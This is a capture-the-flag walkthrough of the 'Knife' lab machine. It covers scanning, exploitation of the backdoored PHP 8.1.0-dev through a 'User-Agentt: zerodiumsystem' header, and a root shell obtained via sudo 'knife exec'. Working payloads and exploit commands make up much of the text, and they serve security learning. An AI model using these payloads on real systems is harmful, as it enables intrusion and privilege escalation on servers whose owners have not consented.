Knife is an easy difficulty Linux machine that features an application which is running on a backdoored version of PHP: PHP/8.1.0-dev. This vulnerability is leveraged to obtain the foothold on the server. A sudo misconfiguration is then exploited to gain a root shell.
Nmap
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$ nmap -sVC -v --min-rate 1000 -p- -oN nmap-fullscan.out
Nmap scan report for knife.htb (10.10.10.242)
Host is up (0.083s latency).
Not shown: 65142 closed ports, 391 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
| 256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_ 256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Web enumeration
Directory brute forcing
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
$ ffuf -u http://10.10.10.242/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -e .php,.html,.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : GET
:: URL : http://10.10.10.242/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
:: Extensions : .php .html .txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
index.php [Status: 200, Size: 5815, Words: 646, Lines: 221]
server-status [Status: 403, Size: 277, Words: 20, Lines: 10]
[Status: 200, Size: 5815, Words: 646, Lines: 221]
.html [Status: 403, Size: 277, Words: 20, Lines: 10]
Nikto
1
2
3
4
5
6
7
8
9
10
11
12
13
$ nikto -h 10.10.10.242
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.242
+ Target Hostname: 10.10.10.242
+ Target Port: 80
+ Start Time: 2021-07-01 14:35:11 (GMT5.5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ Retrieved x-powered-by header: PHP/8.1.0-dev
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
Zerodium exploit
An early release of PHP, the PHP 8.1.0-dev version was released with a backdoor on March 28th 2021. Two malicious commits were pushed to the php-src repo from the names of Rasmus Lerdorf and Nikita Popov. Everything pointed towards a compromise of the git.php.net server. These are the two malicious commits. https://github.com/php/php-src/commit/c730aa26bd52829a49f2ad284b181b7e82a68d7d https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
This indicates that an attacker can execute arbitrary code by sending the User-Agentt header. To exploit manually, just pass the another header:
1
User-Agentt: zerodiumsystem(whoami);
Or you can use the following exploit uses the backdoor to provide a pseudo shell on the host. https://www.exploit-db.com/exploits/49933
1
2
3
4
5
6
7
8
$ python3 49933.py
Enter the full host url:
http://10.10.10.242/
Interactive shell is opened on http://10.10.10.242/
Can't acces tty; job crontol turned off.
$ whoami
james
Privesc with Knife utility
Checking out sudo permissions for user james shows some tool called knife.
1
2
3
4
5
6
$ sudo -l
Matching Defaults entries for james on knife:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on knife:
(root) NOPASSWD: /usr/bin/knife
knife --helpgives us a lot of options which can be helpful, most lucrative of all isexec:
1
2
3
4
5
6
7
8
9
10
$ knife --help
Chef Infra Client: 16.10.8
Docs: https://docs.chef.io/workstation/knife/
[..snip..]
** EXEC COMMANDS **
knife exec [SCRIPT] (options)
[..snip..]
--helpdoes not specify which script it runs, which is clearly mentioned in their documentation online: https://docs.chef.io/workstation/knife_exec
“Use the knife exec subcommand to execute Ruby scripts in the context of a fully configured Chef Infra Client. This subcommand has the following options:
-E CODE, --exec CODEA string of code to be executed.”
There are three ways to use knife exec to run Ruby script files. For example: knife exec /path/to/script_file or: knife exec -E 'RUBY CODE'
- Grab a stabilized shell using
id_rsain/home/james/.ssh/id_rsaor a reverse-shell.1 2 3 4
$ sudo /usr/bin/knife exec -E 'system("/bin/bash -pi")' bash: cannot set terminal process group (938): Inappropriate ioctl for device bash: no job control in this shell root@knife:/#